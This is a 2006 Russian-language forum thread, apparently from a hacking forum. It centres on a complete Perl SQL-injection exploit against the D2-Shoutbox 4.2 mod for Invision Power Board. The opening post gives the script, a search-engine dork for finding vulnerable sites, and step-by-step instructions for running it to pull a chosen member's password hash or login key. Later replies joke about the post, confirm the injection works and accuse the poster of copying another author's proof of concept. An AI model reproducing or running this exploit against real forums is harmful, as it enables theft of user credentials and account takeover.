Чаты D2-Shoutbox

Dracula4ever · 13 May 2006

Взлов чата на Ipb

Ладно,сначало скачайте програму ActivePerl.
её можно скпчпть отсюда.

http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.7.813-MSWin32-x86-148120.msi

Теперь где вставляют тексты в той програме перепишите этот код:

#!/usr/bin/perl
#########################################################
# _______ _______ ______ #
# |______ |______ | \ #
# ______| |______ |_____/ #
# #
#D2-Shoutbox 4.2(IPB Mod)<=SQL injection #
#Created By dracula4ever #
#ANTICHAT security Team #
#
#[email protected]#
#ISRAEL #
#########################################################
#google:
#"Powered By D2-Shoutbox 4.2"
#########################################################
use IO::Socket;
$host = $ARGV[0];
$user = $ARGV[2];
$uid = $ARGV[3];
$pid = $ARGV[4];
$type = $ARGV[5];

sub type()
{
if($type==1){$row="password";}
if($type==2){$row="member_login_key";}
else{print "Just 1 Or 2\n";exit();}
$sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*";
$path = $ARGV[1].$sql;
}

sub header()
{
print q{
#######################################################################
### D2-Shoutbox 4.2 SQL injection Exploit ###
### Tested On D2-Shoutbox 4.2 And IPB 2.4 ###
### Created By Dracula4ever, ANTICHAT Security Team ###
#######################################################################
sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
#######################################################################
}
}

sub sedsock()
{
$sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n";
print $sedsock "GET $path HTTP/1.1\n";
print $sedsock "Host: $host\n";
print $sedsock "Accept: */*\n";
print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
print $sedsock "Connection: close\n\n";
while($res = <$sedsock>){
$res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n";
}
}

if(@ARGV < 6){
header();
}else{
type();
sedsock();
}
Click to expand...

Теперь сохраните это с названием ipb.pl в дисководе С:/
Теперь зайдите в CMD и напишите color a потом cd c:\ и потом cls и в конце напишите perl ipb.pl .

Надеюсь вам понравилось.

LoFFi · 13 May 2006

=)))))))))))))))))))))))))
Я сначала даже не понял это =)))))))))
ЛОЛ. вот это пособие.........

Совет: Выложи какую нить багу или что нибудь в этом роде, а вот как ей пользоватся, мы то уж знаем, а те кто не знают, пусть и не лезут пока на бедные сайты.
ИМХО: Создавать отдельную тему не надо было =) Ты б еще в статьи затулил =)

Dracula4ever · 13 May 2006

Если ты знаеш Perl тогда ты всё поймеш

degeneration x · 13 May 2006

D2-Shoutbox не столь популярен, и на форумы его почти не ставят.

qBiN · 13 May 2006

ANTICHAT Security Team
Click to expand...

Паржал...Переправить следует...Во вторых чаты в чаты.

max_pain89 · 13 May 2006

ANTICHAT security Team
Click to expand...

Такая есть? Гг тут только группы.

Rebz · 13 May 2006

#Created By dracula4ever #
#ANTICHAT security Team #

Хаххаа))))))))) нда.. это сильно!
Не надо гнать на Шаутбокс..распространенная вещь -))

по теме - молоток.. инъекция работает..

Zitt · 13 May 2006

Но для отделной темы всёравно моловато!

Rebz · 13 May 2006

http://ivdb.org/poc/1337.htm
Так кто же истинный автор уязвимости??????

ps плохо не соблюдать чужие копирайты и переделывать их на свои

.Slip · 13 May 2006

Rebz, ты прям Шерлок Холмс
dracula4ever, стыдись ****

konstantin · 14 May 2006

Очень хорошо обьяснил

Dracula4ever · 17 May 2006

я рад что ты это понял

froZen* · 22 May 2006

#!/usr/bin/perl
################################################## #######
# _______ _______ ______ #
# |______ |______ | \ #
# ______| |______ |_____/ #
# #
#D2-Shoutbox 4.2(IPB Mod)<=SQL injection #
#Created By dracula4ever #
#ANTICHAT security Team #
#
#[email protected]#
#ISRAEL #

LOL

Чаты D2-Shoutbox

Dracula4ever Elder - Старейшина

LoFFi Elder - Старейшина

Dracula4ever Elder - Старейшина

degeneration x Elder - Старейшина

qBiN Вот такой вот я :(

max_pain89 Eat `em UP!

Rebz Banned

Zitt Elder - Старейшина

Rebz Banned

.Slip Elder - Старейшина

konstantin New Member

Dracula4ever Elder - Старейшина

froZen* New Member

Useful Searches

Чаты D2-Shoutbox

Dracula4ever Elder - Старейшина

LoFFi Elder - Старейшина

Dracula4ever Elder - Старейшина

degeneration x Elder - Старейшина

qBiN Вот такой вот я :(

max_pain89 Eat `em UP!

Rebz Banned

Zitt Elder - Старейшина

Rebz Banned

.Slip Elder - Старейшина

konstantin New Member

Dracula4ever Elder - Старейшина

froZen* New Member